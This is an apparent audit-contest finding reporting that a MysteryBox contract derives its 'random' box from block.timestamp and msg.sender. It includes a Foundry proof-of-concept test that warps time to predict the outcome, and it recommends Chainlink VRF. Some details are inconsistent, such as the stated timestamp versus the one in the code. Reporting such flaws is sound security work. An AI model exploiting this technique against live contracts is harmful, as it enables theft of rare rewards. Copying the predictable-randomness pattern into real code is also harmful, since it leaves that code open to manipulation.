Submission Details
Severity:
Weak randomness in the MysteryBox: openBox allows anyone to manipulate the randomValue
Summary :
Hashing msg.sender, block.timestamp, block.difficulty can be manipulated.A predictable box is not good random box.Malicious users can fix the timestampstamp box to choose the box they want.
Vulnerability Details :
**The vulnerability is in this line **
uint256 randomValue = uint256(
keccak256(abi.encodePacked(block.timestamp, msg.sender))
) % 100;
using hashing is not safest way to choose a random number.
Impact :
any user can fix the timestamp for example and choose the box he want which makes all the box have the same rareity .
Proof of Concept:
function testRandomeness() public {
uint256 timeStampNow = 1727720163;
uint256 expectedTimeStamp = timeStampNow + 9;
address attacker = makeAddr("attacker");
vm.deal(attacker, 1 ether);
vm.warp(expectedTimeStamp);
vm.startPrank(attacker);
mysteryBox.buyBox{value: 0.1 ether}();
uint256 expectedRandomValue = uint256(
keccak256(abi.encodePacked(expectedTimeStamp, attacker))
) % 100;
console.log("the expected RandomValue is ", expectedRandomValue);
mysteryBox.openBox();
vm.stopPrank();
}
In this test i fixed the expectedTimeStamp to 10000 s and i got console::log("the expected RandomValue is ", 90), 90 as a random Value which give me access to one of the rarest box which is the Bronze Box.If we can manipulate the timeStamp to win the Bronze Box, we can also manipulate it to win the golden Box.
Recommendations :
Consider using an oracle for your randomness like Chainlink VRF.
Rewards breakdown
nSLOC
86This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.